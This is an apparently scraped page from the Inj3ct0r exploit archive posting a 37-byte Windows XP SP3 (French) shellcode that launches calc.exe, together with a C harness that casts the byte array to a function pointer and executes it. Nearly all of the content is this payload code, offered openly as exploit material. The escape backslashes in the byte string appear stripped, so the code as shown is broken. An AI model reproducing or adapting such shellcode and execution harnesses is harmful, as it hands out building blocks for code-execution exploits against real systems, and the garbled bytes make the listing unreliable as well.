Home / os / win7

win32/xp sp3 (Fr) calc.exe shellcode 37 bytes

Posted on 27 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/xp sp3 (Fr) calc.exe shellcode 37 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= win32/xp sp3 (Fr) calc.exe shellcode 37 bytes ============================================= /* * Title: Windows XP SP3 Fr (calc.exe) shellcode 37 bytes * Type: Shellcode * Author: antrhacks * Platform: win32 * Tested on: Windows XP SP3 Home edition Fr */ #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; int main(){ char shellcode[] = &quot;xebx16x5bx50x88x43x09x53&quot; &quot;xbbx0dx25x86x7c&quot; &quot;xffxd3x31xc0&quot; &quot;xbbx12xcbx81x7c&quot; &quot;xffxd3xe8xe5xffxffxff&quot; &quot;x63x61x6cx63x2e&quot; &quot;x65x78x65&quot;; printf(&quot;Taille: %d &quot;, strlen(shellcode)); getchar(); (*(void (*)()) shellcode)(); return 0; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP